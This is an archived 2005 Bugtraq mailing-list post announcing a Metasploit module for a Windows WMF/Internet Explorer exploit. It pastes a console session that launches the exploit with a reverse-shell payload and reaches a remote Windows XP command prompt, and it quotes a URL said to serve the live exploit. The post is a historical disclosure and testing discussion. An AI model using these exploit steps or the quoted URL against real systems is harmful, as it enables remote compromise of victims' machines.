| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 27 Dec 2005 21:34:51 -0600 From: H D Moore <sflist@...italoffense.net> To: bugtraq@...urityfocus.com Subject: Re: Is this a new exploit? I ported the exploit to the Metasploit Framework in case anyone wants to test it without installing a thousand spyware apps... Available from 'msfupdate' for MSF users, or in the 2.5 snapshot: --http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile --http://metasploit.com/tools/framework-2.5-snapshot.tar.gz Tested on Win XP SP1 and SP2. -HD + -- --=[ msfconsole v2.5 [147 exploits - 77 payloads] msf > use ie_xp_pfv_metafile msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2 LHOST -> 192.168.0.2 msf ie_xp_pfv_metafile(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://0.0.0.0:8080/anything.wmf [*] HTTP Client connected from 192.168.0.219:1060 using Windows XP [*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\XXXX\Desktop> On Tuesday 27 December 2005 14:20, noemailpls@...mail.ziper wrote: > Warning the following URL successfully exploited a fully patched > windows xp system with a freshly updated norton anti virus. > > unionseek.com/d/t1/wmf_exp.htm > > The url runs a .wmf and executes the virus, f-secure will pick up the > virus norton will not.
Powered by blists - more mailing lists